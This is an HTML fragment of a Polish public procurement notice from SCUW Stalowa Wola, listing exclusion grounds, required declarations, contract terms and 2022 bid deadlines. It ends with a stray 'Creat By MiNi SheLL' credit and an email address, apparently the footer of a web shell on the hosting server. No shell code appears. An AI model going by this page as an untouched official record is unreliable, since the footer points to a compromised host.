class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Centralny Zamawiający nie<br/>żąda przedłożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia. Wykonawca składa wraz<br/>z ofertą oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Centralny Zamawiający nie<br/>żąda przedłożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia. Wykonawca składa wraz<br/>z ofertą oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Centralny Zamawiający nie<br/>żąda przedłożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw do wykluczenia. Wykonawca składa wraz<br/>z ofertą oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Na ofertę składają się następujące dokumenty i załączniki które pod rygorem nieważności, składa się w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym:<br/>1) formularz ofertowy; dokument wygenerowany i wypełniony na platformie e-zamówienia.<br/>2)Formularz asortymentowo-cenowy zał. nr 2 do SWZ<br/>2. Wraz z ofertą wykonawca winien przesłać wyłącznie w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym:<br/>1) Pełnomocnictwo (jeżeli dotyczy).<br/>2) oświadczenie wykonawcy na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne potwierdzenie spełniania<br/>warunków udziału w postępowaniu oraz potwierdzenie braku podstaw do wykluczenia – składane odrębnie przez<br/>wykonawcę lub każdego z wykonawców konsorcjum - załącznik nr 2;<br/>3) oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp stanowiące wstępne potwierdzenie spełniania warunków udziału w<br/>postępowaniu oraz potwierdzenie braku podstaw do wykluczenia – podpisane odrębnie przez podmiot udostępniający<br/>zasoby - załącznik nr 3;<br/>4) zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy zasobów na okres korzystania z nich przy<br/>wykonywaniu zamówienia (jeżeli dotyczy) - załącznik nr – podpisane odrębnie przez podmiot udostępniający zasoby -<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>załącznik nr 5;<br/>5) Oświadczenie o którym mowa w art. 117 ust. 3 ustawy (dotyczy tylko wykonawców wspólnie ubiegających się o<br/>zamówienie) - załącznik nr 4. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany zgodnie ze wzorem umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">SCUW Stalowa Wola Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com